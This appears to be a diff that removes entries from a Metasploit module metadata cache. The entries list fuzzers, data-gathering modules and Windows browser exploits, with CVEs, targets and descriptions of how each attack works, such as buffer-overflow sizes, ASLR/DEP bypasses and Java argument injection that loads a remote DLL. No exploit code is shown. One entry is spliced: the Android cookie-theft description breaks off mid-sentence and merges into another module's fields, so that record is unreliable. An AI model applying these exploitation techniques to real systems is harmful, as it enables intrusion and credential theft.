2638 - ], - "autofilter_services": [ - "ms-sql-s", - "ms-sql2000", - "sybase" - ], - "targets": null, - "mod_time": "2017-07-24 06:26:21 +0000", - "path": "/modules/auxiliary/fuzzers/tds/tds_login_corrupt.rb", - "is_install_path": true, - "ref_name": "fuzzers/tds/tds_login_corrupt", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "actions": [] - }, - "auxiliary_fuzzers/tds/tds_login_username": { - "name": "TDS Protocol Login Request Username Fuzzer", - "fullname": "auxiliary/fuzzers/tds/tds_login_username", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "auxiliary", - "author": [ - "hdm " - ], - "description": "This module sends a series of malformed TDS login requests.", - "references": [], - "platform": "", - "arch": "", - "rport": 1433, - "autofilter_ports": [ - 1433, - 1434, - 1435, - 14330, - 2533, - 9152, - 2638 - ], - "autofilter_services": [ - "ms-sql-s", - "ms-sql2000", - "sybase" - ], - "targets": null, - "mod_time": "2017-07-24 06:26:21 +0000", - "path": "/modules/auxiliary/fuzzers/tds/tds_login_username.rb", - "is_install_path": true, - "ref_name": "fuzzers/tds/tds_login_username", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "actions": [] - }, - "auxiliary_gather/acronis_cyber_protect_machine_info_disclosure": { - "name": "Acronis Cyber Protect/Backup machine info disclosure", - "fullname": "auxiliary/gather/acronis_cyber_protect_machine_info_disclosure", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "auxiliary", - "author": [ - "h00die-gr3y ", - "Sandro Tolksdorf of usd AG." - ], - "description": "Acronis Cyber Protect or Backup is an enterprise backup/recovery solution for all,\n compute, storage and application resources. Businesses and Service Providers are using it\n to protect and backup all IT assets in their IT environment.\n This module exploits an authentication bypass vulnerability at the Acronis Cyber Protect\n appliance which, in its default configuration, allows the anonymous registration of new\n backup/protection agents on new endpoints. This API endpoint also generates bearer tokens\n which the agent then uses to authenticate to the appliance.\n As the management web console is running on the same port as the API for the agents, this\n bearer token is also valid for any actions on the web console. This allows an attacker\n with network access to the appliance to start the registration of a new agent, retrieve\n a bearer token that provides admin access to the available functions in the web console.\n\n This module will gather all machine info (endpoints) configured and managed by the appliance.\n This information can be used in a subsequent attack that exploits this vulnerability to\n execute arbitrary commands on both the managed endpoint and the appliance.\n This exploit is covered in another module `exploit/multi/acronis_cyber_protect_unauth_rce_cve_2022_3405`.\n\n Acronis Cyber Protect 15 (Windows, Linux) before build 29486 and\n Acronis Cyber Backup 12.5 (Windows, Linux) before build 16545 are vulnerable.", - "references": [ - "CVE-2022-30995", - "CVE-2022-3405", - "URL-https://herolab.usd.de/security-advisories/usd-2022-0008/", - "URL-https://attackerkb.com/topics/27RudJXbN4/cve-2022-30995" - ], - "platform": "", - "arch": "", - "rport": 9877, - "autofilter_ports": [ - 80, - 8080, - 443, - 8000, - 8888, - 8880, - 8008, - 3000, - 8443 - ], - "autofilter_services": [ - "http", - "https" - ], - "targets": null, - "mod_time": "2024-11-26 16:10:14 +0000", - "path": "/modules/auxiliary/gather/acronis_cyber_protect_machine_info_disclosure.rb", - "is_install_path": true, - "ref_name": "gather/acronis_cyber_protect_machine_info_disclosure", - "check": true, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "SideEffects": [ - "artifacts-on-disk", - "ioc-in-logs" - ], - "Reliability": [ - "repeatable-session" - ] - }, - "session_types": false, - "needs_cleanup": false, - "actions": [] - }, - "auxiliary_gather/adobe_coldfusion_fileread_cve_2023_26360": { - "name": "Adobe ColdFusion Unauthenticated Arbitrary File Read", - "fullname": "auxiliary/gather/adobe_coldfusion_fileread_cve_2023_26360", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "auxiliary", - "author": [ - "sf " - ], - "description": "This module exploits a remote unauthenticated deserialization of untrusted data vulnerability in Adobe\n ColdFusion 2021 Update 5 and earlier as well as ColdFusion 2018 Update 15 and earlier, in order to read\n an arbitrary file from the server.\n\n To run this module you must provide a valid ColdFusion Component (CFC) endpoint via the CFC_ENDPOINT option,\n and a valid remote method name from that endpoint via the CFC_METHOD option. By default an endpoint in the\n ColdFusion Administrator (CFIDE) is provided. If the CFIDE is not accessible you will need to choose a\n different CFC endpoint, method and parameters.", - "references": [ - "CVE-2023-26360", - "URL-https://attackerkb.com/topics/F36ClHTTIQ/cve-2023-26360/rapid7-analysis" - ], - "platform": "", - "arch": "", - "rport": 8500, - "autofilter_ports": [ - 80, - 8080, - 443, - 8000, - 8888, - 8880, - 8008, - 3000, - 8443 - ], - "autofilter_services": [ - "http", - "https" - ], - "targets": null, - "mod_time": "2024-01-07 15:02:53 +0000", - "path": "/modules/auxiliary/gather/adobe_coldfusion_fileread_cve_2023_26360.rb", - "is_install_path": true, - "ref_name": "gather/adobe_coldfusion_fileread_cve_2023_26360", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "SideEffects": [ - "artifacts-on-disk", - "ioc-in-logs" - ], - "Reliability": [] - }, - "session_types": false, - "needs_cleanup": false, - "actions": [] - }, - "auxiliary_gather/advantech_webaccess_creds": { - "name": "Advantech WebAccess 8.1 Post Authentication Credential Collector", - "fullname": "auxiliary/gather/advantech_webaccess_creds", - "aliases": [], - "rank": 300, - "disclosure_date": "2017-01-21", - "type": "auxiliary", - "author": [ - "h00die", - "sinn3r " - ], - "description": "This module allows you to log into Advantech WebAccess 8.1, and collect all of the credentials.\n Although authentication is required, any level of user permission can exploit this vulnerability.\n\n Note that 8.2 is not suitable for this.", - "references": [ - "CVE-2016-5810", - "URL-https://github.com/rapid7/metasploit-framework/pull/7859#issuecomment-274305229" - ], - "platform": "", - "arch": "", - "rport": 80, - "autofilter_ports": [ - 80, - 8080, - 443, - 8000, - 8888, - 8880, - 8008, - 3000, - 8443 - ], - "autofilter_services": [ - "http", - "https" - ], - "targets": null, - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/auxiliary/gather/advantech_webaccess_creds.rb", - "is_install_path": true, - "ref_name": "gather/advantech_webaccess_creds", - "check": false, - "post_auth": true, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "actions": [] - }, - "auxiliary_gather/alienvault_iso27001_sqli": { - "name": "AlienVault Authenticated SQL Injection Arbitrary File Read", - "fullname": "auxiliary/gather/alienvault_iso27001_sqli", - "aliases": [], - "rank": 300, - "disclosure_date": "2014-03-30", - "type": "auxiliary", - "author": [ - "Brandon Perry " - ], - "description": "AlienVault 4.5.0 is susceptible to an authenticated SQL injection attack via a PNG\n generation PHP file. This module exploits this to read an arbitrary file from\n the file system. Any authenticated user is able to exploit it, as administrator\n privileges aren't required.", - "references": [ - "EDB-32644" - ], - "platform": "Linux", - "arch": "", - "rport": 443, - "autofilter_ports": [ - 80, - 8080, - 443, - 8000, - 8888, - 8880, - 8008, - 3000, - 8443 - ], - "autofilter_services": [ - "http", - "https" - ], - "targets": null, - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/auxiliary/gather/alienvault_iso27001_sqli.rb", - "is_install_path": true, - "ref_name": "gather/alienvault_iso27001_sqli", - "check": false, - "post_auth": true, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "actions": [] - }, - "auxiliary_gather/alienvault_newpolicyform_sqli": { - "name": "AlienVault Authenticated SQL Injection Arbitrary File Read", - "fullname": "auxiliary/gather/alienvault_newpolicyform_sqli", - "aliases": [], - "rank": 300, - "disclosure_date": "2014-05-09", - "type": "auxiliary", - "author": [ - "Chris Hebert " - ], - "description": "AlienVault 4.6.1 and below is susceptible to an authenticated SQL injection attack against\n newpolicyform.php, using the 'insertinto' parameter. This module exploits the vulnerability\n to read an arbitrary file from the file system. Any authenticated user is able to exploit\n this, as administrator privileges are not required.", - "references": [ - "CVE-2014-5383", - "OSVDB-106815", - "EDB-33317", - "URL-http://forums.alienvault.com/discussion/2690/security-advisories-v4-6-1-and-lower" - ], - "platform": "", - "arch": "", - "rport": 443, - "autofilter_ports": [ - 80, - 8080, - 443, - 8000, - 8888, - 8880, - 8008, - 3000, - 8443 - ], - "autofilter_services": [ - "http", - "https" - ], - "targets": null, - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/auxiliary/gather/alienvault_newpolicyform_sqli.rb", - "is_install_path": true, - "ref_name": "gather/alienvault_newpolicyform_sqli", - "check": false, - "post_auth": true, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "actions": [] - }, - "auxiliary_gather/android_browser_file_theft": { - "name": "Android Browser File Theft", - "fullname": "auxiliary/gather/android_browser_file_theft", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "auxiliary", - "author": [ - "Rafay Baloch", - "joev " - ], - "description": "This module steals the cookie, password, and autofill databases from the\n Browser application on AOSP 4.3 and below.", - "references": [ - "URL-https://android.googlesource.com/platform/packages/apps/Browser/+/d2391b492dec778452238bc6d9d549d56d41c107%5E%21/#F0", - "URL-https://bugs.chromium.org/p/chromium/issues/detail?id=90222" - ], - "platform": "", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": null, - "mod_time": "2022-01-23 15:28:32 +0000", - "path": "/modules/auxiliary/gather/android_browser_file_theft.rb", - "is_install_path": true, - "ref_name": "gather/android_browser_file_theft", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "actions": [ - { - "name": "WebServer", - "description": "Serve exploit via web server" - } - ] - }, - "auxiliary_gather/android_browser_new_tab_cookie_theft": { - "name": "Android Browser \"Open in New Tab\" Cookie Theft", - "fullname": "auxiliary/gather/android_browser_new_tab_cookie_theft", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "auxiliary", - "author": [ - "Rafay Baloch", - "joev " - ], - "description": "In Android's stock AOSP Browser application and WebView component, the\n \"open in new tab\" functionality allows a file URL to be opened. On\n versions of Android before 4.4, the path to the sqlite cookie\n database could be specified. By saving a cookie containing a .\n\n IE Tabs, WScript and subsequent Powershell prompts all run as x86 even when run from\n an x64 iexplore.exe.\n\n By default, this module will not attempt to fire against IEs that come with Protected\n Mode enabled by default, because it can trigger a security prompt. However, if you are\n feeling brave, you can choose to ignore this restriction by setting the ALLOWPROMPT\n datastore option to true.", - "references": [ - "URL-http://support.microsoft.com/kb/182569", - "URL-http://blog.invisibledenizen.org/2009/01/ieunsafescripting-metasploit-module.html", - "URL-http://support.microsoft.com/kb/870669" - ], - "platform": "Windows", - "arch": "x86", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Windows x86/x64" - ], - "mod_time": "2021-01-13 11:06:01 +0000", - "path": "/modules/exploits/windows/browser/ie_unsafe_scripting.rb", - "is_install_path": true, - "ref_name": "windows/browser/ie_unsafe_scripting", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/browser/imgeviewer_tifmergemultifiles": { - "name": "Viscom Image Viewer CP Pro 8.0/Gold 6.0 ActiveX Control", - "fullname": "exploit/windows/browser/imgeviewer_tifmergemultifiles", - "aliases": [], - "rank": 300, - "disclosure_date": "2010-03-03", - "type": "exploit", - "author": [ - "Dr_IDE", - "TecR0c ", - "mr_me " - ], - "description": "This module exploits a stack based buffer overflow in the Active control file\n ImageViewer2.OCX by passing an overly long argument to an insecure TifMergeMultiFiles()\n method. Exploitation results in code execution with the privileges of the user who\n browsed to the exploit page.\n\n The victim will first be required to trust the publisher Viscom Software.\n This module has been designed to bypass DEP and ASLR under XP IE8, Vista and Win7\n with Java support.", - "references": [ - "CVE-2010-5193", - "OSVDB-78102", - "EDB-15668", - "URL-http://web.archive.org/web/20101204093821/http://secunia.com:80/advisories/42445", - "URL-http://xforce.iss.net/xforce/xfdb/63666" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Automatic", - "Internet Explorer 6/7", - "Internet Explorer 8 with JRE" - ], - "mod_time": "2023-03-23 10:19:30 +0000", - "path": "/modules/exploits/windows/browser/imgeviewer_tifmergemultifiles.rb", - "is_install_path": true, - "ref_name": "windows/browser/imgeviewer_tifmergemultifiles", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/browser/indusoft_issymbol_internationalseparator": { - "name": "InduSoft Web Studio ISSymbol.ocx InternationalSeparator() Heap Overflow", - "fullname": "exploit/windows/browser/indusoft_issymbol_internationalseparator", - "aliases": [], - "rank": 300, - "disclosure_date": "2012-04-28", - "type": "exploit", - "author": [ - "Alexander Gavrun", - "Dmitriy Pletnev", - "James Fitts ", - "juan vazquez " - ], - "description": "This module exploits a heap overflow found in InduSoft Web Studio <= 61.6.00.00\n SP6. The overflow exists in the ISSymbol.ocx, and can be triggered with a long\n string argument for the InternationalSeparator() method of the ISSymbol control.\n This module uses the msvcr71.dll form the Java JRE6 to bypass ASLR.", - "references": [ - "CVE-2011-0340", - "OSVDB-72865", - "BID-47596", - "ZDI-12-168", - "URL-http://web.archive.org/web/20110506063846/http://secunia.com:80/secunia_research/2011-37" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Automatic", - "IE 6 on Windows XP SP3", - "IE 7 on Windows XP SP3", - "IE 8 on Windows XP SP3", - "IE 7 on Windows Vista", - "IE 8 on Windows Vista", - "IE 8 on Windows 7", - "IE 9 on Windows 7" - ], - "mod_time": "2023-03-23 10:19:30 +0000", - "path": "/modules/exploits/windows/browser/indusoft_issymbol_internationalseparator.rb", - "is_install_path": true, - "ref_name": "windows/browser/indusoft_issymbol_internationalseparator", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/browser/inotes_dwa85w_bof": { - "name": "IBM Lotus iNotes dwa85W ActiveX Buffer Overflow", - "fullname": "exploit/windows/browser/inotes_dwa85w_bof", - "aliases": [], - "rank": 300, - "disclosure_date": "2012-06-01", - "type": "exploit", - "author": [ - "Gaurav Baruah", - "juan vazquez " - ], - "description": "This module exploits a buffer overflow vulnerability on the UploadControl\n ActiveX. The vulnerability exists in the handling of the \"Attachment_Times\"\n property, due to the insecure usage of the _swscanf. The affected ActiveX is\n provided by the dwa85W.dll installed with the IBM Lotus iNotes ActiveX installer.\n\n This module has been tested successfully on IE6-IE9 on Windows XP, Vista and 7,\n using the dwa85W.dll 85.3.3.0 as installed with Lotus Domino 8.5.3.\n\n In order to bypass ASLR the no aslr compatible module dwabho.dll is used. This one\n is installed with the iNotes ActiveX.", - "references": [ - "CVE-2012-2175", - "OSVDB-82755", - "BID-53879", - "ZDI-12-132", - "URL-http://www-304.ibm.com/support/docview.wss?uid=swg21596862" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Automatic", - "IE 6 on Windows XP SP3", - "IE 7 on Windows XP SP3", - "IE 8 on Windows XP SP3", - "IE 7 on Windows Vista", - "IE 8 on Windows Vista", - "IE 8 on Windows 7", - "IE 9 on Windows 7" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/browser/inotes_dwa85w_bof.rb", - "is_install_path": true, - "ref_name": "windows/browser/inotes_dwa85w_bof", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/browser/intrust_annotatex_add": { - "name": "Quest InTrust Annotation Objects Uninitialized Pointer", - "fullname": "exploit/windows/browser/intrust_annotatex_add", - "aliases": [], - "rank": 200, - "disclosure_date": "2012-03-28", - "type": "exploit", - "author": [ - "rgod ", - "mr_me " - ], - "description": "This module exploits an uninitialized variable vulnerability in the\n Annotation Objects ActiveX component. The ActiveX component loads into memory without\n opting into ALSR so this module exploits the vulnerability against windows Vista and\n Windows 7 targets. A large heap spray is required to fulfill the requirement that EAX\n points to part of the ROP chain in a heap chunk and the calculated call will hit the\n pivot in a separate heap chunk. This will take some time in the users browser.", - "references": [ - "CVE-2012-5896", - "OSVDB-80662", - "BID-52765", - "EDB-18674" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Automatic", - "Windows XP/Vista SP0-SP3 (IE6/IE7)", - "Windows XP SP0-SP3 DEP bypass (IE8)", - "Windows 7/Vista ALSR/DEP bypass (IE8)" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/browser/intrust_annotatex_add.rb", - "is_install_path": true, - "ref_name": "windows/browser/intrust_annotatex_add", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/browser/java_basicservice_impl": { - "name": "Sun Java Web Start BasicServiceImpl Code Execution", - "fullname": "exploit/windows/browser/java_basicservice_impl", - "aliases": [], - "rank": 600, - "disclosure_date": "2010-10-12", - "type": "exploit", - "author": [ - "Matthias Kaiser", - "egypt " - ], - "description": "This module exploits a vulnerability in Java Runtime Environment\n that allows an attacker to escape the Java Sandbox. By injecting\n a parameter into a javaws call within the BasicServiceImpl class\n the default java sandbox policy file can be therefore overwritten.\n The vulnerability affects version 6 prior to update 22.\n\n NOTE: Exploiting this vulnerability causes several sinister-looking\n popup windows saying that Java is \"Downloading application.\"", - "references": [ - "CVE-2010-3563", - "OSVDB-69043", - "URL-http://mk41ser.blogspot.com" - ], - "platform": "Java,Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Windows x86", - "Generic (Java Payload)" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/browser/java_basicservice_impl.rb", - "is_install_path": true, - "ref_name": "windows/browser/java_basicservice_impl", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/browser/java_cmm": { - "name": "Java CMM Remote Code Execution", - "fullname": "exploit/windows/browser/java_cmm", - "aliases": [], - "rank": 300, - "disclosure_date": "2013-03-01", - "type": "exploit", - "author": [ - "Unknown", - "juan vazquez " - ], - "description": "This module abuses the Color Management classes from a Java Applet to run\n arbitrary Java code outside of the sandbox as exploited in the wild in February\n and March of 2013. The vulnerability affects Java version 7u15 and earlier and 6u41\n and earlier and has been tested successfully on Windows XP SP3 and Windows 7 SP1\n systems. This exploit doesn't bypass click-to-play, so the user must accept the java\n warning in order to run the malicious applet.", - "references": [ - "CVE-2013-1493", - "OSVDB-90737", - "BID-58238", - "URL-https://blogs.oracle.com/security/entry/security_alert_cve_2013_1493", - "URL-http://www.oracle.com/technetwork/topics/security/alert-cve-2013-1493-1915081.html", - "URL-http://web.archive.org/web/20161013042610/http://pastie.org/pastes/6581034" - ], - "platform": "Java,Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Generic (Java Payload)", - "Windows x86 (Native Payload)" - ], - "mod_time": "2025-02-07 12:36:11 +0000", - "path": "/modules/exploits/windows/browser/java_cmm.rb", - "is_install_path": true, - "ref_name": "windows/browser/java_cmm", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/browser/java_codebase_trust": { - "name": "Sun Java Applet2ClassLoader Remote Code Execution", - "fullname": "exploit/windows/browser/java_codebase_trust", - "aliases": [], - "rank": 600, - "disclosure_date": "2011-02-15", - "type": "exploit", - "author": [ - "Frederic Hoguin", - "jduck " - ], - "description": "This module exploits a vulnerability in the Java Runtime Environment\n that allows an attacker to run an applet outside of the Java Sandbox. When\n an applet is invoked with:\n\n 1. A \"codebase\" parameter that points at a trusted directory\n 2. A \"code\" parameter that is a URL that does not contain any dots\n\n the applet will run outside of the sandbox.\n\n This vulnerability affects JRE prior to version 6 update 24.", - "references": [ - "CVE-2010-4452", - "OSVDB-71193", - "ZDI-11-084", - "URL-http://fhoguin.com/2011/03/oracle-java-unsigned-applet-applet2classloader-remote-code-execution-vulnerability-zdi-11-084-explained/", - "URL-http://www.oracle.com/technetwork/topics/security/javacpufeb2011-304611.html" - ], - "platform": "Java", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Generic (Java Payload)" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/browser/java_codebase_trust.rb", - "is_install_path": true, - "ref_name": "windows/browser/java_codebase_trust", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/browser/java_docbase_bof": { - "name": "Sun Java Runtime New Plugin docbase Buffer Overflow", - "fullname": "exploit/windows/browser/java_docbase_bof", - "aliases": [], - "rank": 500, - "disclosure_date": "2010-10-12", - "type": "exploit", - "author": [ - "jduck " - ], - "description": "This module exploits a flaw in the new plugin component of the Sun Java\n Runtime Environment before v6 Update 22. By specifying specific parameters\n to the new plugin, an attacker can cause a stack-based buffer overflow and\n execute arbitrary code.\n\n When the new plugin is invoked with a \"launchjnlp\" parameter, it will\n copy the contents of the \"docbase\" parameter to a stack-buffer using the\n \"sprintf\" function. A string of 396 bytes is enough to overflow the 256\n byte stack buffer and overwrite some local variables as well as the saved\n return address.\n\n NOTE: The string being copied is first passed through the \"WideCharToMultiByte\".\n Due to this, only characters which have a valid localized multibyte\n representation are allowed. Invalid characters will be replaced with\n question marks ('?').\n\n This vulnerability was originally discovered independently by both Stephen\n Fewer and Berend Jan Wever (SkyLined). Although exhaustive testing hasn't\n been done, all versions since version 6 Update 10 are believed to be affected\n by this vulnerability.\n\n This vulnerability was patched as part of the October 2010 Oracle Patch\n release.", - "references": [ - "CVE-2010-3552", - "OSVDB-68873", - "BID-44023", - "URL-http://blog.harmonysecurity.com/2010/10/oracle-java-ie-browser-plugin-stack.html", - "ZDI-10-206", - "URL-http://code.google.com/p/skylined/issues/detail?id=23", - "URL-http://web.archive.org/web/20130119152812/http://skypher.com:80/index.php/2010/10/13/issue-2-oracle-java-object-launchjnlp-docbase/", - "URL-http://www.oracle.com/technetwork/topics/security/javacpuoct2010-176258.html" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Windows Universal (msvcr71.dll ROP)" - ], - "mod_time": "2025-02-28 09:35:28 +0000", - "path": "/modules/exploits/windows/browser/java_docbase_bof.rb", - "is_install_path": true, - "ref_name": "windows/browser/java_docbase_bof", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/browser/java_mixer_sequencer": { - "name": "Java MixerSequencer Object GM_Song Structure Handling Vulnerability", - "fullname": "exploit/windows/browser/java_mixer_sequencer", - "aliases": [], - "rank": 500, - "disclosure_date": "2010-03-30", - "type": "exploit", - "author": [ - "Peter Vreugdenhil", - "juan vazquez " - ], - "description": "This module exploits a flaw within the handling of MixerSequencer objects\n in Java 6u18 and before.\n\n Exploitation id done by supplying a specially crafted MIDI file within an RMF\n File. When the MixerSequencer objects is used to play the file, the GM_Song\n structure is populated with a function pointer provided by a SONG block in the\n RMF. A Midi block that contains a MIDI with a specially crafted controller event\n is used to trigger the vulnerability.\n\n When triggering the vulnerability \"ebx\" points to a fake event in the MIDI file\n which stores the shellcode. A \"jmp ebx\" from msvcr71.dll is used to make the\n exploit reliable over java updates.", - "references": [ - "CVE-2010-0842", - "OSVDB-63493", - "BID-39077", - "ZDI-10-060", - "URL-http://web.archive.org/web/20210624004250/http://vreugdenhilresearch.nl/java-midi-parse-vulnerabilities/" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Windows / Java 6 <=u18" - ], - "mod_time": "2025-02-28 09:35:28 +0000", - "path": "/modules/exploits/windows/browser/java_mixer_sequencer.rb", - "is_install_path": true, - "ref_name": "windows/browser/java_mixer_sequencer", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/browser/java_ws_arginject_altjvm": { - "name": "Sun Java Web Start Plugin Command Line Argument Injection", - "fullname": "exploit/windows/browser/java_ws_arginject_altjvm", - "aliases": [], - "rank": 600, - "disclosure_date": "2010-04-09", - "type": "exploit", - "author": [ - "jduck " - ], - "description": "This module exploits a flaw in the Web Start plugin component of Sun Java\n Web Start. The arguments passed to Java Web Start are not properly validated.\n By passing the lesser known -J option, an attacker can pass arbitrary options\n directly to the Java runtime. By utilizing the -XXaltjvm option, as discussed\n by Ruben Santamarta, an attacker can execute arbitrary code in the context of\n an unsuspecting browser user.\n\n This vulnerability was originally discovered independently by both Ruben\n Santamarta and Tavis Ormandy. Tavis reported that all versions since version\n 6 Update 10 \"are believed to be affected by this vulnerability.\"\n\n In order for this module to work, it must be ran as root on a server that\n does not serve SMB. Additionally, the target host must have the WebClient\n service (WebDAV Mini-Redirector) enabled.", - "references": [ - "CVE-2010-0886", - "CVE-2010-1423", - "OSVDB-63648", - "BID-39346", - "URL-http://archives.neohapsis.com/archives/fulldisclosure/2010-04/0122.html", - "URL-http://www.reversemode.com/index.php?option=com_content&task=view&id=67&Itemid=1" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Automatic", - "Java Runtime on Windows x86" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/browser/java_ws_arginject_altjvm.rb", - "is_install_path": true, - "ref_name": "windows/browser/java_ws_arginject_altjvm", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/browser/java_ws_double_quote": { - "name": "Sun Java Web Start Double Quote Injection", - "fullname": "exploit/windows/browser/java_ws_double_quote", - "aliases": [], - "rank": 600, - "disclosure_date": "2012-10-16", - "type": "exploit", - "author": [ - "Rh0 " - ], - "description": "This module exploits a flaw in the Web Start component of the Sun Java\n Runtime Environment. Parameters initial-heap-size and max-heap-size in a JNLP\n file can contain a double quote which is not properly sanitized when creating\n the command line for javaw.exe. This allows the injection of the -XXaltjvm\n option to load a jvm.dll from a remote UNC path into the java process. Thus\n an attacker can execute arbitrary code in the context of a browser user.\n This flaw was fixed in Oct. 2012 and affects JRE <= 1.6.35 and <= 1.7.07.\n\n In order for this module to work, it must be run as root on a server that\n does not serve SMB (In most cases, this means non-Windows hosts). Additionally,\n the target host must have the WebClient service (WebDAV Mini-Redirector) enabled.\n Alternatively, a UNC path containing a jvm.dll can be specified, bypassing\n the Windows limitation for the Metasploit host.", - "references": [ - "CVE-2012-1533", - "OSVDB-86348", - "BID-56046", - "URL-http://www.oracle.com/technetwork/topics/security/javacpuoct2012-1515924.html", - "URL-http://pastebin.com/eUucVage " - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Automatic", - "Java Runtime 1.6.31 to 1.6.35 and 1.7.03 to 1.7.07 on Windows x86" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/browser/java_ws_double_quote.rb", - "is_install_path": true, - "ref_name": "windows/browser/java_ws_double_quote", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/browser/java_ws_vmargs": { - "name": "Sun Java Web Start Plugin Command Line Argument Injection", - "fullname": "exploit/windows/browser/java_ws_vmargs", - "aliases": [], - "rank": 600, - "disclosure_date": "2012-02-14", - "type": "exploit", - "author": [ - "jduck " - ], - "description": "This module exploits a flaw in the Web Start component of the Sun Java\n Runtime Environment. The arguments passed to Java Web Start are not properly\n validated, allowing injection of arbitrary arguments to the JVM.\n\n By utilizing the lesser known -J option, an attacker can take advantage of\n the -XXaltjvm option, as discussed previously by Ruben Santamarta. This method\n allows an attacker to execute arbitrary code in the context of an unsuspecting\n browser user.\n\n In order for this module to work, it must be run as root on a server that\n does not serve SMB. Additionally, the target host must have the WebClient\n service (WebDAV Mini-Redirector) enabled.", - "references": [ - "CVE-2012-0500", - "OSVDB-79227", - "BID-52015", - "URL-https://seclists.org/fulldisclosure/2012/Feb/251", - "URL-http://www.oracle.com/technetwork/topics/security/javacpufeb2012-366318.html" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Automatic", - "Java Runtime on Windows x86" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/browser/java_ws_vmargs.rb", - "is_install_path": true, - "ref_name": "windows/browser/java_ws_vmargs", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/browser/juniper_sslvpn_ive_setupdll": { - "name": "Juniper SSL-VPN IVE JuniperSetupDLL.dll ActiveX Control Buffer Overflow", - "fullname": "exploit/windows/browser/juniper_sslvpn_ive_setupdll", - "aliases": [], - "rank": 300, - "disclosure_date": "2006-04-26", - "type": "exploit", - "author": [ - "aushack " - ], - "description": "This module exploits a stack buffer overflow in the JuniperSetupDLL.dll\n library which is called by the JuniperSetup.ocx ActiveX\tcontrol,\n as part of the Juniper SSL-VPN (IVE) appliance. By specifying an\n overly long string to the ProductName object parameter, the stack\n is overwritten.", - "references": [ - "CVE-2006-2086", - "OSVDB-25001", - "BID-17712", - "URL-http://archives.neohapsis.com/archives/fulldisclosure/2006-04/0743.html" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - 